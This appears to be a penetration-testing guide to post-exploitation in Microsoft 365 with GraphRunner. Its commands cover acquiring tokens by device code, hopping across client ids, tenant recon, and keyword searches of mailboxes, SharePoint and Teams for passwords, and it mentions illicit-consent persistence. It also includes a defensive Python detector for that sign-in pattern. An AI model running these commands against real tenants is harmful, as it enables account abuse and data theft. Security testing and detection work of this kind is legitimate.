
Microsoft 365 pillaging

With a valid user token in a tenant, pillage the apps that user can already reach (mailbox, OneDrive, SharePoint, Teams) for credentials, secrets, and sensitive business data, and enumerate app registrations, dynamic groups, and consent grants from a single point. Our tool of choice is GraphRunner, a PowerShell post-exploitation toolkit for the Microsoft Graph API. It also contains primitives for persistence (illicit consent grant via Invoke-InjectOAuthApp) and lateral movement.

GraphRunner

Authentication

The built-in Get-GraphTokens does the device code flow against the well-known Microsoft Office client id and stores tokens in $tokens for the rest of the session. Token scopes are determined by the Office client id consented in the target tenant. If a query 403s, refresh with a different FOCI client id (see entrascopes.com for what scopes each first-party app pre-consents).

```powershell
. .\GraphRunner.ps1
Get-GraphTokens
```

Browse to https://microsoft.com/devicelogin, enter the displayed code, and authenticate as the assessment user. For unattended re-use, refresh the access token from the stored refresh token:

```powershell
Invoke-RefreshGraphTokens -RefreshToken $tokens.refresh_token -Tenant <tenantid>
```
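The device code sign-in and the follow-on refreshes under other FOCI client ids both leave entries in Entra ID sign-in logs. The added example below (not part of the page or of GraphRunner) runs a simple detection over constructed sign-in records: it flags every device-code authentication and any user who, from the same IP, then obtains non-interactive tokens for three or more distinct client ids within ten minutes. Field names follow the Microsoft Graph `signIn` resource (`authenticationProtocol` is from the beta schema); the `APP-*` appIds are placeholders, not real client ids.

```python
"""Flag device-code sign-ins and cross-client token refresh in Entra ID sign-in records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records. Field names follow the Graph signIn resource
# (authenticationProtocol is beta-only); appIds are placeholders, not real client ids.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "alice@example.com", "appId": "APP-OFFICE", "ipAddress": "203.0.113.7",
     "createdDateTime": "2024-05-01T09:00:00Z", "authenticationProtocol": "deviceCode", "isInteractive": True},
    {"userPrincipalName": "alice@example.com", "appId": "APP-TEAMS", "ipAddress": "203.0.113.7",
     "createdDateTime": "2024-05-01T09:02:00Z", "authenticationProtocol": "none", "isInteractive": False},
    {"userPrincipalName": "alice@example.com", "appId": "APP-OUTLOOK", "ipAddress": "203.0.113.7",
     "createdDateTime": "2024-05-01T09:03:30Z", "authenticationProtocol": "none", "isInteractive": False},
    {"userPrincipalName": "alice@example.com", "appId": "APP-AZCLI", "ipAddress": "203.0.113.7",
     "createdDateTime": "2024-05-01T09:05:00Z", "authenticationProtocol": "none", "isInteractive": False},
    {"userPrincipalName": "bob@example.com", "appId": "APP-OFFICE", "ipAddress": "198.51.100.4",
     "createdDateTime": "2024-05-01T10:00:00Z", "authenticationProtocol": "oAuth2", "isInteractive": True},
]


def _ts(rec):
    """Parse the ISO-8601 createdDateTime (with trailing Z) into an aware datetime."""
    return datetime.fromisoformat(rec["createdDateTime"].replace("Z", "+00:00"))


def device_code_signins(records):
    """Return (upn, ip, time) for every sign-in completed via the device code flow."""
    return [(r["userPrincipalName"], r["ipAddress"], r["createdDateTime"])
            for r in records if r.get("authenticationProtocol") == "deviceCode"]


def foci_hopping(records, min_apps=3, window=timedelta(minutes=10)):
    """Users who, from one IP, obtained non-interactive tokens for >= min_apps distinct
    client ids within `window` after a device-code sign-in, i.e. one refresh token being
    redeemed across several first-party clients. Returns {upn: sorted appIds}."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["userPrincipalName"], r["ipAddress"])].append(r)
    hits = {}
    for (upn, _ip), recs in by_key.items():
        recs.sort(key=_ts)
        for i, start in enumerate(recs):
            if start.get("authenticationProtocol") != "deviceCode":
                continue
            apps = {r["appId"] for r in recs[i + 1:]
                    if not r.get("isInteractive") and _ts(r) - _ts(start) <= window}
            if len(apps) >= min_apps:
                hits[upn] = sorted(apps)
    return hits
```

Tune `min_apps` and `window` against your tenant's baseline; legitimate Office clients also refresh across a handful of first-party appIds, so the device-code precondition is what keeps the rule useful.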

Recon

Invoke-GraphRecon dumps tenant identity info, current user's directory roles, app registrations, dynamic groups, and a permissions overview to recon.txt:

```powershell
Invoke-GraphRecon -Tokens $tokens -PermissionEnum
```

Targeted enumeration helpers worth knowing:

```powershell
Get-DynamicGroups        -Tokens $tokens
Get-AppPermissions       -Tokens $tokens
Get-AzureADUsers         -Tokens $tokens -OutFile users.csv
Get-Inbox                -Tokens $tokens -UserId <upn>
Get-SecurityGroups       -Tokens $tokens
```

Pillaging

Query against mail, SharePoint, OneDrive, and Teams via cross-service keyword search:

```powershell
Invoke-SearchMailbox      -Tokens $tokens -SearchTerm 'password'  -OutFile mail-hits.csv
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password' -ResultSize 200
Invoke-SearchTeams        -Tokens $tokens -SearchTerm 'password'
```

Invoke-ImmersiveFileReader decodes the obfuscated OneDrive/SharePoint Immersive Reader URLs that occasionally surface in mailbox hits.